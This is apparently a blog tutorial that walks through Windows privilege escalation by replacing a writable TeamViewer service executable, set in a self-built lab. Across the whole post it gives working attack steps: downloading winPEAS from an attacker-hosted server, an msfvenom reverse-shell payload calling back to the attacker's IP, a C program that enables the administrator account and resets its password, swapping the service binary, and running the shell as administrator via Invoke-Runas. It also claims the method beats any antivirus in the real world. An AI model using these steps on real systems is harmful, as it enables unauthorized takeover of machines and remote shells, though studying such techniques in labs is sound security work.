Windows Privilege Escalation — Service directory write based privesc (Method 2)
Service directory write based privesc — 2nd Method
Before exploiting the service, we will create the vulnerable machine ourselves and perform the exploit.
Copy the Lab Setup and Initial Access steps from previous blog:
Let’s perform the window privilege escalation attack
(Service directory write based privesc )
Successfully got the initial shell
Now the question comes , when you have the initial shell what will you do in windows operating system.
The first thing is to upload winpeas without thinking twice.
https://github.com/carlospolop/PEASS-ng/releases/download/20230910-ae32193f/winPEASx64.exe
Start a python server , and download winpeas in window’s system.
$powershell -c wget http://192.168.29.219:8001/winPEASx64.exe -OutFile win.exe
Now run the winpeas i.e., downloaded in the system.
Here we are totally interested in “Installed Application [All Access]”
AUTO_START — As soon as system boots/restart the service will also restart.
BINARY_PATH_NAME — Service executable path.
SERVICE_START_NAME is LocalSystem which means service is running from highest privilege.
Here we cannot start/stop the service.
But we can write in service executable directory.
So, let’s generate a payload using “msfvenom”.
$msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.29.219 lport=9009 -f exe > shell9009.exe
We will write the above payload to TeamViewer executable.
Now the question comes how do we start the service???
As, we noticed that service is in AUTO_START mode
Let’s check that if we have rights to restart the system
In below poc “SeSutdownPrivilege” its showing Disabled , but it is enabled by default , so ignore that.
Now we will create a script that will work for all environment , it will work in real world also irrespective of any kind of anti-virus.
Let’s assume , administrator user will be present in the system by-default.
If you are not able to get administrator user reverse shell , due to the firewall/network/some other problem.
If you got the web initial shell of web application through user account or by any other means that means you have command executing facilities on target.
But sometimes it will not be active , so we activate the administrative user in 1st step , then in next step we will change the password for administrator user to “Admin1234”.
#include<stdio.h>
void main()
{
system("net user administrator /active yes");
system("net user administrator Admin1234");
}
Compile the script using compiler and save as “script.exe”.
We will download the above script to TeamViewer executable path.
Whenever any service is in running condition , and its executable is in use , and if you try to write anything then it will prompt “The process cannot access the file because it is being used by another process.”
Now we will use “rename” , we have renamed our executable.
Copy script.exe in name of TeamViewer_Service.exe and if anyone will use this file again the code inside script.exe will be triggered.
This is the method we have to follow in service directory write based privlege escalation.
We have renamed the running service executable, and write our file in place of that.
Now “TeamViewer” official path is replaced with our malicious executable file.
How to take advantage of this?
We have to reboot the system.
Rebooting the system.
Now the question comes
Then what is the advantage of activating the password for “administrator” ???
If SMB,RDP or SSH might have been activated , then you can use administrator credentials and you can take shell.
Now how will you take the shell here??
We will use “runas.ps1” script
https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1
Download the “runas.ps1” script to the target system , and add the module to the current session via
$Import-Module .\runas.ps1
In script we have two types of logon
Here we will use 0x1
In the command we have to give path for particular executable. example :“C:\Users\Public\shell9009.exe”.
The script will run the executable with administrator rights.
Now we will give the executable generated from msfvenom for reverse shell.
Provide user as “Administrator” and password “Admin1234” .
Here we got the shell and the currently logged-in user is “administrator”.
